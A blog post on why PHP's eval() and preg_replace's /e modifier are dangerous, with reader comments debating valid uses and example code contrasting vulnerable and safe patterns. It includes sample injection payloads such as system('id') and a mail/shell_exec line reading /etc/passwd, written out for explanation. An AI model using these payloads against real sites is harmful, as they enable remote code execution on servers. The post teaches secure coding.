PHP eval is evil

JSON creator Douglas Crockford has pointed out more than once that in JavaScript, eval is evil. In PHP, eval is almost always evil as well (some people say it can be useful in a few limited cases). I personally do not have the guts to use it. Allowing any user-supplied data to go into an eval( ) call is asking to be hacked: whoever controls that string controls what your server executes.

eval( ) also has aliases. Do not use the /e modifier with preg_replace( ): with /e, preg_replace( ) substitutes the backreferences into the replacement string and then evaluates the result as PHP code, so any user-entered data in the pattern, the replacement or the subject can end up being executed. (The /e modifier was deprecated in PHP 5.5 and removed in PHP 7; preg_replace_callback( ) is the replacement.)

So what does eval do? eval( string $code_str ) evaluates the string given in code_str as PHP code, in the current scope, exactly as if you had written it into your script. Imagine you read a form's username input field with eval($_POST['username']). If the hacker types the following value into the input field: mail("hacker@somewhere.com", "Some passwords", '/bin/cat /etc/passwd'), your server runs it. (Strictly, that exact string only mails the literal text '/bin/cat /etc/passwd', and /etc/passwd holds account names rather than password hashes, which live in /etc/shadow and are normally unreadable by the web server's user. But the attacker can just as easily write shell_exec('/bin/cat /etc/passwd'), system(), or anything else into the field: eval( ) hands them a full PHP interpreter running with whatever privileges your web server has.)
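The two injection paths above side by side with their safe replacements, as an added example that is not code from the original post. The function names, the template syntax and the sample inputs are assumptions made for the illustration; the /e variant only behaves as described on PHP 5, since PHP 7 and later reject that modifier.

```php
<?php
// Added example, not from the original post. Two ways user data can reach the
// interpreter: a direct eval() of generated source, and the /e modifier of
// preg_replace(), which on PHP 5 evaluated the replacement string as PHP code
// (/e was deprecated in 5.5 and removed in PHP 7). Function names are assumed.

// Vulnerable: $name becomes part of the program text that eval() compiles.
// An input such as   "; system('id'); //   closes the string literal and the
// rest of it runs as PHP, so a "hello" page becomes remote code execution.
function greet_with_eval(string $name): string
{
    eval('$greeting = "Hello ' . $name . '";');   // eval() shares this scope
    return $greeting;
}

// Safe: no source code is built from data; the value is only ever a string.
function greet(string $name): string
{
    return 'Hello ' . $name;
}

// Vulnerable (PHP 5 only): with /e the replacement is evaluated as PHP after
// backreference substitution, so a $value like  {${system('id')}}  executes.
// PHP 7+ rejects the /e modifier with a warning and returns null.
function fill_template_e(string $tpl, string $value)
{
    return preg_replace('/\{NAME\}/e', '"' . $value . '"', $tpl);
}

// Safe: preg_replace_callback() runs a real closure; placeholder values are
// looked up in an array and are never parsed as code.
function fill_template(string $tpl, array $vars): string
{
    return preg_replace_callback(
        '/\{([A-Z_]+)\}/',
        function (array $m) use ($vars): string {
            return $vars[$m[1]] ?? $m[0];   // unknown placeholder: leave as-is
        },
        $tpl
    );
}

// Constructed input: the same "payload" strings handed to the safe versions
// come back as plain text, because nothing ever interprets them.
echo greet('"; system(\'id\'); //'), PHP_EOL;
echo fill_template('Hi {NAME}, order {ID} is on its way', [
    'NAME' => '{${system(\'id\')}}',
    'ID'   => '42',
]), PHP_EOL;
```

The safe versions never concatenate user data into something that is later compiled, which is the whole difference: a string that is only ever treated as data cannot close a quote, inject a statement or call system( ), no matter what it contains.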

So don’t use eval unless you are suicidal. ;)


About Shi Chuan

I am a web developer.
This entry was posted in PHP Core.

18 Responses to PHP eval is evil

  1. Ross says:

    I find eval very helpful in variable setting examples, for example:

    eval('$this->debug =' . (IS_PHP4 ? '&' : '') . ' new stdClass();');

    The only cases where eval is “evil” are where you’re inputting user data into eval – but you should be validating and sanitising any user input anyway.

  2. admin says:

    Hi, Ross

    In your case, it provides convenience and is really helpful. What I mentioned in my post was more about the possible problems eval causes.

    I really appreciate your opinion. :)

  3. Matt says:

    In your first paragraph you’re assuming that any use of eval() is evil? You say that allowing any user-supplied data to go into eval() is asking to be hacked; that’s not the same thing as just using eval().

    I was using eval() today (though, admittedly, I am strongly against eval() too) but none of the data in it is user-supplied.

  4. max says:

    “if the hacker type the following value in the input field”

    he gets nothing with your example except an email with the ‘/bin/cat /etc/passwd’ text.

  5. Rob says:

    I too use eval() and find it is a very useful and powerful function.

    It’s only ‘evil’ to the idiots who don’t use correct input validation and allow any content to be eval()’d.

    If you design your product right, you shouldn’t have any problems. Avoiding eval, for me. Just isn’t a solution.

    Also, max is right.

  6. Aaron says:

    Max is right, and I agree with Rob.

    Even if they did get the contents of your passwd file, it actually only contains information on users, like id, username, group. No password; the password is in the shadow file…

  7. Teo Iliev says:

    You just have to always escape the eval statement.

    eval("echo \$variable;");

    You can also use eval to return some reference or value:

    $result_variable = eval("return \$static" . $dynamic . ";");

  8. Mike says:

    Eval can be a useful function, however it can also be an open invitation for malicious code. In most cases, eval can and should be avoided, especially when validating user inputted data.

    Eval, imho, is best used as a limited method for interpreting templated data (ie Smarty), but again anytime you give users the power of the programmer bad things can happen.

    Just a word of caution to all my fellow programmers… no one writes code using eval with the idea that it can be manipulated… so just be very careful how you use it.

    – Mike :o)

  9. kaizoku says:

    /etc/passwd is useless anyways.

  10. Julius Domingo says:

    eval() is used in PHP frameworks.
    Specifically, it can be used in declaring dynamic variables.
    ex.
    $varname = "myvar";
    eval("\${$varname} = 12345;");

  11. I mostly use eval to help with obfuscation…

    I know it doesn’t really help with obfuscation, but I’ve made a program which nests eval inside eval inside eval, with some string “encryptions” which differ randomly, to help keep skids and possible paying customers (LOL) away from my source code (of course assuming I sold them the system without rights to the source).

    It can be broken, but it really helps cut down on piracy. There is some server time spent decoding each time, but for some scripts a few milliseconds doesn’t matter.

  12. Pingback: How do I execute PHP that is stored in a MySQL database? - Programmers Goodies

  13. Kevin says:

    Even if they DID obtain the contents of /etc/passwd, it’s not like it’d matter. /etc/shadow is what they would really want and you’d have to run your PHP script as root or as user in the shadow group. Which, my friends, is pure suicidal.

  14. Code Overload says:

    There are many cases where you can write code to prevent the use of eval().

    Specifically, it can be used in declaring dynamic variables.
    ex.
    $varname = "myvar";
    eval("\${$varname} = 12345;");

    Have you tried:
    $$varname = 12345;
    Look up variable variables. They work wonders.

    I find eval very helpful in variable setting examples, for example:

    eval('$this->debug =' . (IS_PHP4 ? '&' : '') . ' new stdClass();');

    I must say, you should NEVER couple your code so tightly that you need to eval() it.
    Try this, it not only adds structure, but allows you to keep separate codebases.

    if(IS_PHP4) include 'php4_codebase.php';
    else include 'php5_codebase.php';

    99% of cases that you’d need to use eval() you can avoid with a little bit of logic and a quick dose of documentation.

  15. Jim says:

    In my website /public_html/ I found an extra PHP file, named a.php,

    and I opened this a.php in Dreamweaver; it shows

    Can someone tell me what this means?

    My website was redirected to another website that does not belong to me.

    How can I prevent this?

  16. arnold mercado says:

    Use eval only if you have a specific purpose, but don’t abuse eval. There are many ways you can do without using eval, because eval lets other programmers modify your system externally without your intending it. Putting eval in your code is giving your system a backdoor.

  17. Bas Vijfwinkel says:

    [quote]
    because eval lets other programmers modify your system externally without your intending it. Putting eval in your code is giving your system a backdoor.
    [/quote]
    Nonsense.
    If you properly design your code, then there should be no problem with using eval at all.
    Just make sure that you know exactly what is going into eval.
    Eval can be very helpful if you have very dynamic systems and enables you as a programmer to write very compact code that would otherwise need very complex structures.

    • Ez says:

      Had to chime in here, been researching the use of eval() for a dynamic solution in eCommerce. We want to give additional functionality to our customers (store owners) allowing them to configure their own rules for handling distribution. i.e. order > 70 do x, order < 50 do y etc.

      A valid use of eval(); (If done correctly).
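The store-owner rule scenario from the comment above can be done without giving the owner a PHP interpreter at all. The following is an added example, not Ez's code or anything from the original post: the rule text is parsed with an anchored regular expression into a field, an operator, a number and an action name, each part is checked against a fixed allowlist, and the comparison is performed by a switch rather than by eval(). The rule syntax (`field op number do action`), the field names and the action names are assumptions made for the example.

```php
<?php
// Added example, not from the original post or its comments. Rules such as
// "order_total > 70 do express" are parsed into a (field, operator, number,
// action) tuple; every part is validated against an allowlist before any
// action runs. Rule syntax, field names and action names are assumptions.

final class RuleEngine
{
    private const FIELDS = ['order_total', 'item_count', 'weight_kg'];

    /** @var array<string, callable> action name => handler (the allowlist) */
    private array $actions;

    public function __construct(array $actions)
    {
        $this->actions = $actions;
    }

    /** Parse "order_total > 70 do express" into its parts, or throw. */
    public function parse(string $rule): array
    {
        // Anchored pattern: nothing outside this exact shape is accepted.
        $re = '/^\s*([a-z_]+)\s*(>=|<=|==|!=|>|<)\s*(-?\d+(?:\.\d+)?)\s+do\s+([a-z_]+)\s*$/';
        if (!preg_match($re, $rule, $m)) {
            throw new InvalidArgumentException("Malformed rule: $rule");
        }
        [, $field, $op, $num, $action] = $m;
        if (!in_array($field, self::FIELDS, true)) {
            throw new InvalidArgumentException("Unknown field: $field");
        }
        if (!isset($this->actions[$action])) {
            throw new InvalidArgumentException("Unknown action: $action");
        }
        return ['field' => $field, 'op' => $op, 'value' => (float) $num, 'action' => $action];
    }

    /** Evaluate the comparison with an explicit switch, never with eval(). */
    private function matches(array $rule, array $order): bool
    {
        $lhs = (float) ($order[$rule['field']] ?? 0);
        $rhs = $rule['value'];
        switch ($rule['op']) {
            case '>':  return $lhs >  $rhs;
            case '>=': return $lhs >= $rhs;
            case '<':  return $lhs <  $rhs;
            case '<=': return $lhs <= $rhs;
            case '==': return $lhs == $rhs;
            case '!=': return $lhs != $rhs;
        }
        return false; // unreachable: parse() admits only the operators above
    }

    /** Run the action of every matching rule; returns the action names fired. */
    public function apply(array $rules, array $order): array
    {
        $fired = [];
        foreach ($rules as $text) {
            $rule = $this->parse($text);
            if ($this->matches($rule, $order)) {
                ($this->actions[$rule['action']])($order);
                $fired[] = $rule['action'];
            }
        }
        return $fired;
    }
}

// Constructed sample: the store owner's rules and one incoming order.
$engine = new RuleEngine([
    'express'  => function (array $o) { /* hand to express carrier */ },
    'standard' => function (array $o) { /* hand to standard carrier */ },
    'hold'     => function (array $o) { /* flag for manual review */ },
]);
$rules = [
    'order_total > 70 do express',
    'order_total < 50 do standard',
    'item_count >= 20 do hold',
];
$order = ['order_total' => 120.00, 'item_count' => 3];
print_r($engine->apply($rules, $order));

// A rule that tries to smuggle code, e.g. "order_total > 70 do system('id')",
// is rejected in parse() before any action is even looked up.
try {
    $engine->parse("order_total > 70 do system('id')");
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

The owner gets exactly the expressiveness the feature needs and nothing more: a new comparison or action is added by extending the allowlists, and a rule that does not fit the grammar is an error rather than code.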
